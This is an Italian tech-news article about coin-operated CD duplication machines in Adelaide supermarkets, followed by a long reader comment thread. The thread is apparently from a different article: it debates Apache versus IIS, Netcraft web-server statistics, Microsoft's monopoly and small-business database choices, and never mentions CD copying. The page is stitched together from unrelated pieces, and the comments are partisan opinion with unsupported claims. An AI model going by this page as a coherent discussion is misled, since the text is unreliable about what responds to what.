Australia, i CD si copiano al supermercato

Nel paese aumentano in negozi e supermercati le macchine a monete in grado di duplicare CD. Alla faccia delle campagne anti-pirateria delle major

Adelaide (Australia) – Mentre l’industria discografica è impegnatissima a mettere in atto colossali piani anti-pirateria, comprendenti proposte di legge che vanno dalla tassazione dei CD all’integrazione in hardware di meccanismi anti-copia , presso i supermercati e i punti vendita di Adelaide, in Australia, si stanno pacificamente diffondendo macchine a monete per la duplicazione dei CD.

Per 5$ le “Copy Cat CD Duplication” – questo il nome dei sistemi che hanno sostituito i distributori di chewing gum – sono in grado di copiare un CD in meno di 10 minuti bypassando persino le protezioni più comuni.

Secondo quanto riporta il quotidiano australiano The Advertiser, pare che le macchinette duplicatrici siano già state prese d’assalto da un pubblico giovane, per lo più dedito a scambiarsi e copiare al volo album di musica.

Alcuni esponenti della comunità discografica australiana hanno già lanciato le loro grida di protesta, ed uno di loro, Glenn A. Baker, ha definito queste macchine “moralmente riprovevoli”.

La ditta che produce e installa le Copy Cat, la Multi Tech , replica però che questi sistemi sono del tutto equiparabili alle fotocopiatrici ed operano sotto la stessa legislazione: questo significa che la responsabilità di eventuali violazioni del copyright non ricadono sul proprietario dell’apparecchiatura bensì sull’utilizzatore.

Non senza sarcasmo, qualcuno ha scritto sui forum di Slashdot.org che “questo potrebbe essere un uso interessante di un laptop dotato di CD-RW”. Un portatile in grembo ed una ciotola per le monetine davanti. Altro che new economy…

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    Perche' riskiare con ms...
    Apache e' gratis e robustissimo... perche' perdere tempo e soldi con quella schifezza di IIS??? Forse per scarsa professionalita' :-)
    • Anonimo scrive:
      Re: Perche' riskiare con ms...
      perchè rischiare un crash con un server x, la shell va benissimo e perdo anche meno tempo ad installare...
    • Anonimo scrive:
      Re: Perche' riskiare con ms...
      mah, forse perchè in pieno 2002 un server multiprocessore con sopra il "signor monothread" Apache è un po' sprecato... che dici?
  • Anonimo scrive:
    quando traduciamo traduciamo bene
    Se si va a ben vedere sul sito netcraft viene sottolineato che la "robaccia" ( parking e non i siti veri ) vanno su windows.Secondo sparisce netscape e non diminuisce apache ..il ché è molto diversodal sito di netcraft , commento al survey: " Around the NetMicrosoft gains almost 2 million sites this month, primarily as a result of register.com and Network Solutions migrating their domain parking facilities to a Windows front end.Network Solutions has been running part of its domain parking system on Windows for some time, and has been moving progressively more of its sites from a Solaris Netscape-Enterprise system at Digex to a Windows based system at Interland. Several hundred thousand sites seem to have moved to this system this month, and the drop in Netscape-Enterprise is largely a result of this. Ironically, many of the sites were hacked a few days later, Newsbytes reports.register.com seems to be partway through a migration to Windows. Presently, the bulk of the page content is still served from Linux, with a Windows platform serving framesets referencing the Linux based page content as on this example site."salve a tutti
    • Anonimo scrive:
      Re: quando traduciamo traduciamo bene
      Come ho evidenziato in altri post, la piattaforma win/iis attira i servizi web di bassa qualità, evidentemente più privati e piccole società sono entrati a richiedere servizi a basso costo.Un sistema UNIX/Apache non può per sua natura fornire servizi a bassa qualità cmq; quindi non può entrare su quella fascia di mercato.Un discorso a parte merita Linux che grazie alla sua diffusione, potrebbe cambiare le carte, poichè grazie al minor costo di questa piattaforma, può fronteggiare il costo di win/iis a bassa qualità, fornendo un servizio di poco più costoso ma con buona qualità.
    • Anonimo scrive:
      Questa statistica è faziosa!
      Per altro mi pare di capire che il numero di web server non è uguale al numero di siti.Ciascun web server infatti serve, o parcheggia, un certo numero di siti.Se avessimo al mondo 10 server che servono in tutto 20 siti di cui:9 con Apache, ciascuno che ospita 1 sitoed 1 con IIS che ospita 11 siti.Questa classifica direbbe che IIS detiene il 55% dello share e Apache il 45% !!!Questa statistica è faziosa!Se di diffusione di web server bisogna parlare, come cita l'articolo, io direi piuttosto che il 90% dei server web è Apache ed il restante 10% è di IIS.G
  • Anonimo scrive:
    è triste
    è triste vedere quanti si incavolano con una compagnia che ha successo e attaccano i server che montano i suoi prodotti...
    • Anonimo scrive:
      Re: è triste
      Ti ricordo che il prodotto in questione è il più bug-ato; non è certo colpa di chi attacca i server win/iis.
      • Anonimo scrive:
        Re: è triste
        bug? ne è pieno il mondo, più ne cerchi più li trovi...un prodotto che cerca di dare più supporto possibile ha bisogno di più codice ed è in proporzione più buggato...soprattutto perchè si sposta il focus dalle prestazioni e sicurezza al supporto per gli utenti, questo però per i prodotti M$ è sempre stato un vanto e un vantaggio commerciale, non un handicap.
    • Anonimo scrive:
      Re: è triste che non ti accorgi di che cos'è M$
      - Scritto da:
      è triste vedere quanti si incavolano con una
      compagnia che ha successo si tratta di un'azienda condannata come COLPEVOLE di abuso di MONOPOLIO. Questo è un REATO.E' come incavolarsi con un criminale.Il "successo" di microsoft è dovuto alla posizione di monopolio avuta in dote da IBM
      • Anonimo scrive:
        Re: è triste che non ti accorgi di che cos'è M$
        M$ ha scommesso sulla usabilità più che sull'efficienza e la sicurezza, anche se sulla sicurezza sembra che ora stia facendo ammenda, per questo ha strappato il monopolio dalle tasche di big blue, che non ha capito quello che voleva il mercato. Credi che 20 anni fa o anche solo 10 IBM non potesse esercitare pressioni anche più forti sul mercato? Eppure ora per i piccoli server e per i PC ha perso la leadership...
        • Anonimo scrive:
          Re: è triste che non ti accorgi di che cos'è M$
          si ma questo non toglie che la microsoft per le leggi vigenti attualmente ha commesso un reato e' inutile nascondersi dietro a un dito.
        • Anonimo scrive:
          Re: è triste che non ti accorgi di che cos'è M$
          - Scritto da:
          M$ ha scommesso sulla usabilità più che
          sull'efficienza e la sicurezza, no. microsoft non ha dovuto scommettere per niente. Aveva ed ha il monopolio.
          Credi che 20 anni fa o anche solo 10 IBM non
          potesse esercitare pressioni anche più forti
          sul mercato? IBM ha subìto diversi procedimenti anti-trust.Microsoft è solo l'ultima arrivata, in questo tipo di affari sporchi, ma ha dimostato di saperci sguazzare, finora, ma lo fa a NOSTRE spese, ed è ora che venga FERMATA.
  • Anonimo scrive:
    Per il dottor .NET-tuno
    Credo di essere stato chiaro nell'altro post, ma forse non abbastanza, allora mi spiegherò meglio ora.Non sostengo che il costo complessivo di un sistema UNIX/Apache sia superiore a quello di un sistema win/iis, ma il contrario: se rimango in richieste di alta qualità di servizio.Un sistema UNIX cmq non mi consente di scendere come qualità e di conseguenza come costi (un servizio a qualità inferiore, logicamente costa meno), un sistema win si!Se rimango nella fascia dell'alta qualità di servizio un sistema win (per quanto da solo non mi garantirebbe quella fascia di qualità), solo in prima battuta garantirebbe dei costi inferiori (i tecnici meno costosi, etc.); poi però devo aggiungergi altri problemi che mi alzano i costi: manutenzione più continua, problemi di security maggiori, etc. Problemi notevolmente inferiori rispetto ad un sistema UNIX o UNIX/Apache nel caso.Da ultimo un sistema win/iis non potrebbe esistere da solo nelle fasce di alte qualità di richieste; come in Hotmail dove da poco hanno portato quasi tutti i servizi di server web su win/iis (Apache vi è solo, per quel che si sà, nel caso di problemi di security), questi si appoggiano su una tecnologia UNIX in background.I firewalls sono UNIX (FreeBSD), i server master dei cluster (e non solo) con nodi win/iis sono UNIX (Solaris, poichè la Sun ha la migliore tecnologia per i cluster ad alta disponibilità). Oltrettutto nei cluster, win fa proprio pena, infatti i tempi di risposta dei nodi win/iis sono notevolmente diminuiti (si tratta sempre di tempi inferiori al sec.) rispetto ai nodi FreeBSD/Apache dei cluster Sun/Solaris precedenti; per fortuna che vi è Solaris, altrimenti win/iis non poteva essere installato ad Hotmail.Come ad Hotmail, anche le altre soc. si appoggiano su tecnologie in background UNIX quando si tratta di portare sistemi win/iis a fasce di alta qualità, come quelle menzionate nell'articolo; che sicuramente offorno diversi spettri di proposte per i servizi di web server; e quelle di fascia di alta qualità con win/iis, si devono appoggiare sullo strato di un background UNIX.Resta cmq il fatto che non godono i 2 sistemi, della stessa qualità, anche con server UNIX dedicati come background: i nodi win/iis hanno un tempo di risposta sup. ai nodi UNIX/Apache.Credo che la quota rosicchiata da win/iis sia dovuta proprio al fatto di essere competitivo verso il basso nel servizio rispetto ad UNIX/Apache (che non esiste a qualità basse di servizio). Evidentemente sono aumentati i servizi di web server a qualità basse e di conseguenza a bassi costi. Ciò può essere dovuto all'arrivo sul web di società piccole che non richiedono ai server che ospitano il loro sito, un servizio ad alta qualità, ma si accontentano anche di qualità inferiori con prezzi inferiori (un servizio di web a meno di 50 ? l'anno è veramente di pessima qualità). Nelle fasce di alta qualità, UNIX/Apache impera e ciò è dovuto al fatto che ha il miglior rapporto prezzo/qualità.Purtroppo alle fasce di bassa qualità win/iis non ha concorrenti, ma la diffusione di Linux, potrebbe cambiare anche questo scenario, di più: non ha problemi di security dovuti agli hack e ai crack (chi vuoi sia interessato al sito della piccola società o della persona sconosciuta). Ma chissà , che essendo antipatica ai crack e agli hack M$, quest'ultimi decidano di cambiare e colpire win/iis proprio dove è forte e non ha concorrenza, cioè sulle fasce di bassa qualità. Se ci si rende conto che sono quei siti la roccaforte di win/iis e non quello della società blasonata che al 90% usa UNIX/Apache e quando usa win/iis lo fà per scopi di marketing estranei al servizio web (e magari con UNIX/Apache dietro l'angolo per i problemi come Hotmail); credo che M$ passerebbe dei brutti momenti.
  • Anonimo scrive:
    e voi ci credete anche ?
    Premesso che sono un fan scatenato di IIs, ma voi credete veramente a quanto scrivono questi qui ??
    • Anonimo scrive:
      Re: e voi ci credete anche ?
      questi qui chi?
    • Anonimo scrive:
      Re: e voi ci credete anche ?
      - Scritto da: IIs fan
      Premesso che sono un fan scatenato di IIs,
      ma voi credete veramente a quanto scrivono
      questi qui ??La premessa da sola basta discreditare qualsiasi tua opinione, così come quella di tutti i fan sfegatati di qualsiasi cosa.
    • Anonimo scrive:
      Re: e voi ci credete anche ?
      Sì, ma solo in parte.Io sono della seguente politica:una piattaforma è valida solo se correttamente configurata, il default non piace a nessuno, soprattutto a Ms. E' facile mettere su un IIS, istantaneo direi ma per farlo diventare sicuro ed affidabile ci vuole ben altro. Apache è meno facile configurarlo di per sè, per cui se sai configurarlo sei magari già un pochino più esperto e riesci a trovare la config ottimale.Tutto questo IMHO.Ciao
  • Anonimo scrive:
    IIs the best
    Finalmente arriverà il giorno in cui Apache verrà definitivamente surclassato da IIs!!!IIs è più sicuroIIs è più gestibileIIs è bello
    • Anonimo scrive:
      Re: IIs the best
      nooooooooo ti ho gia' detto che se esageri cosi' si capisce che sei un troll e nessuno ti risponde! Ma non impari mai? Non ci si improvvisa troll in 2 giorni, ci sono persone che ci studiano anni e prendono certificazioni M$ e attestati in trolling, e tu l'ultimo arrivato voreresti fare meglio?Comunque nel caso remoto in cui non fossi un troll ma solo un ignorante leggi qui:http://punto-informatico.it/pol.asp?mid=165700&fid=39675http://punto-informatico.it/pol.asp?mid=165701&fid=39675http://punto-informatico.it/pol.asp?mid=165702&fid=39675
    • Anonimo scrive:
      Re: IIs the best
      - Scritto da: IIs fan
      Finalmente arriverà il giorno in cui Apache
      verrà definitivamente surclassato da IIs!!!
      IIs è più sicuro
      IIs è più gestibile
      IIs è belloma cos'è, la prima lezione della certificazione microsoft?
      • Anonimo scrive:
        Re: IIs the best


        IIs è più sicuro

        IIs è più gestibile

        IIs è bello

        ma cos'è, la prima lezione della
        certificazione microsoft?Zi Zi :)))
    • Anonimo scrive:
      Re: IIs the best
      - Scritto da: IIs fan
      Finalmente arriverà il giorno in cui Apache
      verrà definitivamente surclassato da IIs!!!Non hai capito una mazza di mercato... quando non ci sarà più scelta, pagheremo tutti le conseguenze
      IIs è più sicuroPorta qualche dato che confermi questa tua affermazioneCiaoGianni
    • Anonimo scrive:
      Re: IIs the best
      - Scritto da: IIs fan
      IIs è più sicuro
      IIs è più gestibile
      IIs è belloCerto, come no...La mamma lo sa che ti sei tolto la camicia di forza?
    • Anonimo scrive:
      Re: IIs the best
      IIS e Win sarebbero più sicuri se non ci fossero torme di hackers aizzati (e in alcuni casi pagati) da i big dell'informatica per cercare di ridimensionare il fenomeno M$. Non è facile passare dagli 86 ai server dipartimentali ma M$ ci sta provando ed è inevitabile che parta da sw inferiore.Avete idea dei margini che ha M$ rispetto a IBM e compagnia bella? Sono alti, certo, ma molto più bassi di quelli di tante altre compagnie che ci prendono per i fondelli vendendo sw a cifre assurde (migliaia di euro) che non valgono certo in proporzione di più dei corrispettivi M$, anche io ho paura di un monopolio con conseguente viziatura del mercato, ma già oggi c'è un oligopolio di poche case, a cui M$ vuole fare le scarpe.Almeno M$ si oppone e crea vera innovazione portando il sw a casa di tutti, cercando di unificare le piattaforme, le interfacce e i programmi.Con suoi standard, certo, ma è una compagnia e fa il suo lavoro!Spero che un giorno IBM, Olivetti, Zucchetti ecc... falliscano e smettano di vendere x es un gestionale paghe a 10 milioni!Posso fare le stesse cose con excel!E finiamola di dire che alla nasa usano cluster di calcolo con Linux!Usano sw libero perchè mettendo le mani sui sorgenti ci tirano fuori quello che gli fa comodo, e non potrebbero fare altrimenti!Ma non esistono distribuzioni di Linux in grado di gestire sistemi a centinaia di processori come fa solaris.Speriamo che un giorno ci arrivi M$ o qualcun altro intenzionato a spazzare via chi ci vende sw a margini enormi!
      • Anonimo scrive:
        Re: IIs the best
        - Scritto da: AHO!
        IIS e Win sarebbero più sicuri se non ci
        fossero torme di hackers aizzati (e inhacker!=kracker
        alcuni casi pagati) da i big
        dell'informatica per cercare di
        ridimensionare il fenomeno M$. Non è facilehai le prove di quanto affermi? Io credevo che chi buca IIS fossero script kid che si divertono a defacciare qualche sito ma se tu hai le prove di un complotto ai danni di M$ portale pure.
        vendendo sw a cifre assurde (migliaia di
        euro) che non valgono certo in proporzione
        di più dei corrispettivi M$, anche io hocerto certo infatti acces e' quasi al livello di oracle e sono quei cattivono della sun che esagerano coi prezzi, e poi c'era la marmotta che confezionava la cioccolata.
        Almeno M$ si oppone e crea vera innovazione
        portando il sw a casa di tutti, cercando di
        unificare le piattaforme, le interfacce e i
        programmi.questa e' grossa, M$ impone, grazie alla sua posizione dominante, protocolli e formati chiusi non accessibili ad altri se non con reverse engineering (l'innovazione dove la vedi??)
        E finiamola di dire che alla nasa usano
        cluster di calcolo con Linux!perche' non e' vero?
        Usano sw libero perchè mettendo le mani sui
        sorgenti ci tirano fuori quello che gli fa
        comodo, e non potrebbero fare altrimenti!glielo hai chiesto?
        Ma non esistono distribuzioni di Linux in
        grado di gestire sistemi a centinaia di
        processori come fa solaris.non ce ne e' bisogno esistono ottimi sistemi di clustering per linux (vedi mosix ad esempio), e se permetti un cluster e' un attimino piu' scalabile di un mainframe.
        Speriamo che un giorno ci arrivi M$ o
        qualcun altro intenzionato a spazzare via
        chi ci vende sw a margini enormi!si si speriamo che M$ finalmente riesca a imporre il suo monopolio non se ne puo' piu' con questa pretesa di libera scelta.
        • Anonimo scrive:
          Re: IIs the best
          affermazioni trite e ritrite a cui risponderei se non le avessi già sentite troppe volte.Per quanto riguarda gli standard chiusi, abituatici...Le piccole compagnie si sono rotte di standard aperti di cui non avevano i mezzi e le competenze per accedere.Ad un mio cliente era stato proposto a 20 milioni un gestionale su adbas. Ottimo DB e gratuito.Peccato che dovendo girare in locale fosse una valida alternativa realizzare un db atrezzato con access a una cifra molto inferiore. Così è stato.
          • Anonimo scrive:
            Re: IIs the best
            - Scritto da: AHO!
            affermazioni trite e ritrite a cui
            risponderei se non le avessi già sentite
            troppe volte.be'abbassati al mio livello di povero utonto e illuminami, io in quelle affermazioni ci credo, se sbaglio dimmi in cosa per favore.
            Per quanto riguarda gli standard chiusi,
            abituatici...non credo
            Le piccole compagnie si sono rotte di
            standard aperti di cui non avevano i mezzi e
            le competenze per accedere.non ho capito, stai dicendo che e' piu' facile accedere a standard chiusi tramite reverse che e standard le cui specifiche sono pubbliche?
            Ad un mio cliente era stato proposto a 20
            milioni un gestionale su adbas. Ottimo DB e
            gratuito.
            Peccato che dovendo girare in locale fosse
            una valida alternativa realizzare un db
            atrezzato con access a una cifra molto
            inferiore. Così è stato.se avessi usato mysql avresti speso ancora meno
          • Anonimo scrive:
            Re: IIs the best
            Mi parli di pacchetti e allora io ti rispondo che preferisco scegliere i pacchetti di una casa che fa della standardizzazione e semplificazione una bandiera. Ogni pacchetto ha una sua psicologia nell'ordine e terminologia, ms fino ad oggi ha semplificato la vita degli utenti battendo soprattutto sulla terminologia e sulla funzionalità dell'interfaccia, v. gli esami mscp sono prevalentemente esercizi lessicali.E un monopolio M$ mi spaventa meno di quello di case che hanno margini assolutamente ingiustificabili come l'oligarchia anti M$ che IBM sta cercando di raccogliere intorno a se.
          • Anonimo scrive:
            Re: IIs the best
            vabbe' mi arrendo ora addirittura ne facciamo un problema lessicale l'apprendere l'uso di un pacchetto, usa acces e iis e buon divertimento che ti devo dire?
          • Anonimo scrive:
            Re: IIs the best
            - Scritto da: AHO!
            Ad un mio cliente era stato proposto a 20
            milioni un gestionale su adbas. Ottimo DB e
            gratuito.
            Peccato che dovendo girare in locale fosse
            una valida alternativa realizzare un db
            atrezzato con access a una cifra molto
            inferiore. Così è stato.Ma Adabas non è il pseudo-DB incluso in StarOffice? Da quello che so io è anche peggio di MS Access... altro che ottimo...
          • Anonimo scrive:
            Re: IIs the best
            In rete è ottimo e molto meno affamato di risorse di access, ma allora se vogliamo fae del male al nostro portafoglio su quella cifra prendiamo un as/400 (base non costa tantissimo di più) e lavoriamo in emulazione di terminale... ho clienti che si trovano benissimo con modem a 56K perchè scambiano solo schermate testuali a 4 colori! E la velocità è impressionante (fa +- solo quello...)
          • Anonimo scrive:
            Re: IIs the best
            mysql no e'?
          • Anonimo scrive:
            Re: IIs the best
            - Scritto da: z2
            mysql no e'?si parlava di AS/400mysql al confronto al massimo puo' fare tenerezza...ciao
          • Anonimo scrive:
            Re: IIs the best
            si parlava di una soluzione per una piccola azienda senza troppi soldi da spendere sveglia!rileggi il thread.
          • Anonimo scrive:
            Re: IIs the best
            ma che sei, dell'ufficio marketing di mysql?si parlava anche, se ho capito bene il thread (che ho aperto io), di soluzioni complete.mysql è gratuito ma non una soluzione completa, e svilupparne una costa. AS/400 oggi non costa più cifre proibitive e meglio prendersi un piccolo as e poi farsi i query a mano piuttosto che investire anche solo un quarto su una soluzione sw.E se vogliamo restare nel budget basso, allora con una licenza di office standard (non è free, ma costa abbastanza poco anche per una piccola azienda e poi fa tante cose) posso fare in pochi secondi delle query (MSquery) su file di testo o di excel, che se permetti consentono poi di lavorare con editor di testo o foglio elettronico sui dati estratti, con una libertà che nessuna reportistica di database fornisce di per se!Resta solo da dire che come potenza sui dati non ne ha un gran che e resta appunto confinato alla fascia bassa di mercato.
          • Anonimo scrive:
            Re: IIs the best

            Le piccole compagnie si sono rotte di
            standard aperti di cui non avevano i mezzi e
            le competenze per accedere.ma che stai dicendo? rompersi le scatole di avere la compatibilità e l'interoperabilità? ma ti rendi conto di quello che dici?
            Ad un mio cliente era stato proposto a 20
            milioni un gestionale su adbas. Ottimo DB e
            gratuito.
            Peccato che dovendo girare in locale fosse
            una valida alternativa realizzare un db
            atrezzato con access a una cifra molto
            inferiore. Così è stato.stai facendo un discorso che non sta in piedi. se l'utente avesse la possibilità di avere:-prog che gira su adabas (o postgresql, o un qualsiasi db gratuito e aperto) a 20.000.000+il costo del db(=0)-prog che gira su oracle o sqlserver a 20.000.000 + costo del db (0)l'utente cosa sceglierebbe?
          • Anonimo scrive:
            Re: IIs the best
            ma che cosa stai dicendo? lo hai letto il thread?si sta dicendo che ci sono soluzioni che partono dal free per arrivare a lavori + complessi, personalizzati e rifiniti che hanno costi non contenuti, mentre ci sono soluzioni pay che sono già pronte, a cifre molto inferiori, a dare soluzioni che in alcuni casi sono altrettanto accettabili. E questi sono i casi di molti utenti e piccole aziende.
      • Anonimo scrive:
        Re: IIs the best

        Almeno M$ si oppone e crea vera innovazioneQuali innovazioni, di grazia? Puoi farci qualche esempio?
        portando il sw a casa di tutti,Sembra un merito! Microsoft vende, e vende tanto. La fai apparire come un'opera umanitaria...
        cercando di
        unificare le piattaforme,Microsoft ha sempre cercato di allontanarsi dagli standard, piuttosto, per rafforzare il proprio peso. Non si unificano le piattaforme creando nuovi standard in sostituzione a quelli già approvati ed accolti da tutti, no? Guarda la storia Java-
        J++, ma è solo un esempio tra mille....
        Ma non esistono distribuzioni di Linux in
        grado di gestire sistemi a centinaia di
        processori come fa solaris.Dillo ai tipi di Google, credo che stiano prendendo una grossa cantonata...
        Speriamo che un giorno ci arrivi M$ o
        qualcun altro intenzionato a spazzare via
        chi ci vende sw a margini enormi!Office costa centinaia di Euro, ed è un programma venduto in milioni di copie. Non credi che abbia un prezzo esorbitante? Il gestionale venduto a qualche centinaia di ditte ha un costo in proporzione molto più basso, anche perchè di solito è fornito con un cotratto di assistenza. Gestisci pure una biblioteca con Excel, se ti riesce... O l'archivio dell'USL, o l'anagrafico dell'INPS... Credi che Oracle, Interbase, Informix e i vari DBMS siano stati inventati per fregare il prossimo e nascondergli che con Excel potrebbe fare le stesse cose? E risparmiando? (PS. Se vuoi davvero risparmiare, usare degli standard aperti, garantirti la compatibilità con i formati passati e futuri, essere esente da macrovirus, usa GNumeric o OpenOffice).
        • Anonimo scrive:
          Re: IIs the best
          mi fai solo ridere, le soluzioni su misura hanno fatto il loro tempo!W M$
          • Anonimo scrive:
            Re: IIs the best
            - Scritto da: M$
            mi fai solo ridere, le soluzioni su misura
            hanno fatto il loro tempo!
            W M$Ho capito. Tu sei uno di quelli che porta le calze a tubo "taglia unica". Poi quando uno ti dice che tirano sul tallone rispondi "mi fai solo ridere, le soluzioni su misura hanno fatto il loro tempo".
          • Anonimo scrive:
            Re: IIs the best
            voglio dire che M$ ha capito che la gente vuole programmi base che offrano molte possibilità preconfezionate piuttosto che dovere farsele da soli o doverle comprare a un prezzo e tempo di implementazione non noti in partenza.RISC docet: le operazioni più frequanti vengono eseguite per la maggior parte del tempo = visto cosa vuole più spesso la gente dal programma dai + possibile quelle cose nel programma, fai fare meno personalizzazioni, sposta l'interesse sulle funzionalità e non sulle potenzialità.Non mi dire che non porti i blue jeans ma ti fai fare il vestito dal sarto!Se i concorrenti di M$ perdono questo treno credo che abbiano ben poche possibilità di imporre i loro prodotti (o di farsi scegliere)
          • Anonimo scrive:
            Re: IIs the best
            - Scritto da: M$
            voglio dire che M$ ha capito che la gente
            vuole programmi base che offrano molte
            possibilità preconfezionate piuttosto che
            dovere farsele da soli o doverle comprare a
            un prezzo e tempo di implementazione non
            noti in partenza.a me non frega nulla se l'utonto X non ha voglia di leggersi 10 pagine di manuale di apache e si installa IIS, quello che mi da fastidio e' la banda che si mangiano tutti i server IIS infetti; a parte quello ognuno scelga il web server che si merita, ci mancherebbe.
          • Anonimo scrive:
            Re: IIs the best
            ma allora sei gnucco, la facilità d'uso non è mica un torto!
          • Anonimo scrive:
            Re: IIs the best
            se va a scapito delle prestazioni si, comunque non e' questo il punto ognuno usa quello che vuole e che riesce ad usare, basta che tali scelte non vadano a scapito di altre persone (vedi la banda che si fumano i server IIS infetti, e non sono pochi te lo assicuro)
          • Anonimo scrive:
            Re: IIs the best
            - Scritto da: M$
            mi fai solo ridere, le soluzioni su misura
            hanno fatto il loro tempo!
            W M$Ma sai quello che stai dicendo oppure lo dici per scherzare? Qua non si parla delle esigenze di un utente medio, si parla di ditte o enti. I programmi che controllano le catene di montaggio delle fabbriche sono tutti uguali? Le informazioni contenute nelle basi di dati di ditte o associazioni sono tutte uguali? Eh già... basta access... anche per basi di dati distribuite e con grossi carichi transazionali... o forse basta un foglio excel?
          • Anonimo scrive:
            Re: IIs the best

            mi fai solo ridere, le soluzioni su misura
            hanno fatto il loro tempo!
            W M$sei tu che fai ridere, secondo te come si fa a implementare un gestionale completo (fatture, ordini, clientei, ecc) in excel o in word?vuoi fartelo in access? quanti utenti riuscirebero a farselo da soli?svegliati!
  • Anonimo scrive:
    Spostate P.I. !! :-)
    .. in italia secondo me ci sono piu server winz che in francia !!Mai pensato di trasferire pian piano tutto su linux ?? .. xke non iniziare da punto informatico ?? eheh ..Ciao!
    • Anonimo scrive:
      Re: Spostate P.I. !! :-)
      - Scritto da: eheh
      .. in italia secondo me ci sono piu server
      winz che in francia !!

      Mai pensato di trasferire pian piano tutto
      su linux ?? .. xke non iniziare da punto
      informatico ?? eheh ..
      Tanto più che ogni tanto funziona proprio male...
      • Anonimo scrive:
        Re: Spostate P.I. !! :-)
        - Scritto da: marchet
        - Scritto da: eheh

        .. in italia secondo me ci sono piu server

        winz che in francia !!



        Mai pensato di trasferire pian piano tutto

        su linux ?? .. xke non iniziare da punto

        informatico ?? eheh ..


        Tanto più che ogni tanto funziona proprio
        male...beh... io no direi...PI ad occhio e croce avrà diverse decine di migliaia di pagine viste al giorno... ma rimane comunque abbastanza veloce ed accessibile, nonostante la sua totale dinamicità asp+db....i server con php mi hanno sempre dato l'impressione di essere all'ufficio postale...
        • Anonimo scrive:
          Re: Spostate P.I. !! :-)
          - Scritto da: ToioX
          PI ad occhio e croce avrà diverse decine di
          migliaia di pagine viste al giorno... mapiccola correzione: diverse centinaia di migliaia... mica per niente, eh!Ciao
      • Anonimo scrive:
        Re: Spostate P.I. !! :-)

        Tanto più che ogni tanto funziona proprio
        male...A me funziona sempre a razzo
    • Anonimo scrive:
      Re: Spostate P.I. !! :-)
      - Scritto da: eheh
      .. in italia secondo me ci sono piu server
      winz che in francia !!

      Mai pensato di trasferire pian piano tutto
      su linux ?? .. xke non iniziare da punto
      informatico ?? eheh ..
      Tanto più che ogni tanto funziona proprio male...come ora...
  • Anonimo scrive:
    io li ho segati via tutti
    gli host su IIS. E ho installato apache.
    • Anonimo scrive:
      Re: io li ho segati via tutti
      - Scritto da: nicola
      gli host su IIS.

      E ho installato apache.
      anch'io e dopo averlo fatto gli utenti mi hanno telefonato congratulandosi per l'aumento della banda (che ovviamente non c'e' stato) ^__^
  • Anonimo scrive:
    Apache 2.0
    La nuova relase di Apache porta con sè molte nuove tecnologie, che iis è indietro anni luce (e anche Zeus).Sarà un punto di svolta e M$ dovrà per forza rincorrere.Ma credo che il rosicchiamento delle quote di Apache da parte di iis in primis sia dovuto ad altri fattori che performance e sicurezza. Quest'ultima vede perdente nettamente iis, non a caso i siti che hanno cambiato, come riporta l'articolo, sono stati attaccati subito.Il problema è dovuto a scelte commerciali che si basano sui costi piuttosto che sulla qualità in fatto di sicurezza e performance. Come detto nell'articolo a determinare il cambiamento sono state le scelte fatte da 2 giganti dell'area, scelte determinate da costi. In prima battuta un sistema win/iis è meno costoso di un sistema UNIX/iis. In prima battuta però, a questa vanno aggiunto i costi di manutenzione: scaricamento ed installazione patch, ravvio dei server, etc., il tutto per fornire un servizio decente.Il punto è li, si è scelto di non fornire un super servizio, ma un servizio sufficiente, abbassando i costi cosi.Una scelta che molti hack. e crack. potrebbero far pagare cara, viste già le premesse.Quindi l'arrivo di Apache 2.0 dovrebbe, in teoria, distanziare definitivamente iis. In teoria, perchè purtroppo nel mondo squallido dell'economia, non sempre si punta sul prodotto che offre migliori performance e nuove e più tecnologie, anche se questo è gratuito.Cmq, anche se Apache 2.0 non eliminerà definitivamente iis, dovrebbe ridurre di molto la sua presenza sul mercato.
    • Anonimo scrive:
      Re: Apache 2.0
      Entro fine anno .net server verrà rilasciato e con esso anche iis6. Anche questo porta numerose modifiche e migliorie sia nella gestione che nelle funzionalità.Credo quindi che Apache2 non crei questo divario... ma solo chi vivrà vedrà
      • Anonimo scrive:
        Re: Apache 2.0
        - Scritto da: Andrea
        Entro fine anno .net server verrà rilasciato
        e con esso anche iis6. Anche questo porta
        numerose modifiche e migliorie sia nella
        gestione che nelle funzionalità.
        Credo quindi che Apache2 non crei questo
        divario... ma solo chi vivrà vedràil fatto che già ora Apache è molto meglio di IIS, le future versioni non faranno che accentuare queste differenze...
      • Anonimo scrive:
        Re: Apache 2.0
        Ti posso rispondere che le tecnologie introdotte da Apache 2.0 sono in numero sup a quelle del nuovo iis; ma credo che più della quantità bisognerà vedere il costo del sistema sulle tecnologie che servono per la maggiore, per determinare chi dei 2 sistemi avrà la meglio.Anche se credo inevitabilmente, che l'accoppiata Apache & - Zeus, nel tempo si porteranno sui 3/4 dei server internet (dove per & intendo altri web server web open source, minoritari).Considera che Apache 2.0 ha superato in performance anche iis su o.s. win ovviamente; dapprima lo superava solo su UNIX, il chè essendo UNIX superiore nella rete a win, era ovvio.Non ho visto le caratteristiche del nuovo iis, ma dovrebbe la M$ aver implementato alcune tecnologie prese (non il codice, intendo, ma la sola tecnologia) da Apache 2.0, il ché è legale; cioè ha inseguito. Ora siccome il progetto iis non eccele in sicurezza, l'aver implementato nuove tecnologie, credo che lo penalizzerà di molto soprattutto all'inizio rispetto ad Apache 2.0, e molti hack e crack saranno pronti ad approfittarne.
        • Anonimo scrive:
          Re: Apache 2.0
          - Scritto da: BSD_like
          Ti posso rispondere che le tecnologie
          introdotte da Apache 2.0 sono in numero sup
          a quelle del nuovo iis; ma credo che più
          della quantità bisognerà vedere il costo del
          sistema sulle tecnologie che servono per la
          maggiore, per determinare chi dei 2 sistemi
          avrà la meglio.ariquali?li multithreading? apache era l'unico a non essserlotra l'altro c'e' un progetto SGI per migliorare le performance del runtime multipiattaforma di apache, visto che i thread che usa hanno performance stabili fra le varie piattaforme ma abbastanza scadenti se confrontate con altre soluzioni.
          Anche se credo inevitabilmente, che
          l'accoppiata Apache & - Zeus, nel tempo si
          porteranno sui 3/4 dei server internet (dove
          per & intendo altri web server web open
          source, minoritari).
          Considera che Apache 2.0 ha superato in
          performance anche iis su o.s. win
          ovviamente; dapprima lo superava solo su
          UNIX, il chè essendo UNIX superiore nella
          rete a win, era ovvio.su quali test?invio di pagine html statiche?o usando script?con quali moduli abilitati?
          Non ho visto le caratteristiche del nuovo
          iis, ma dovrebbe la M$ aver implementato
          alcune tecnologie prese (non il codice,
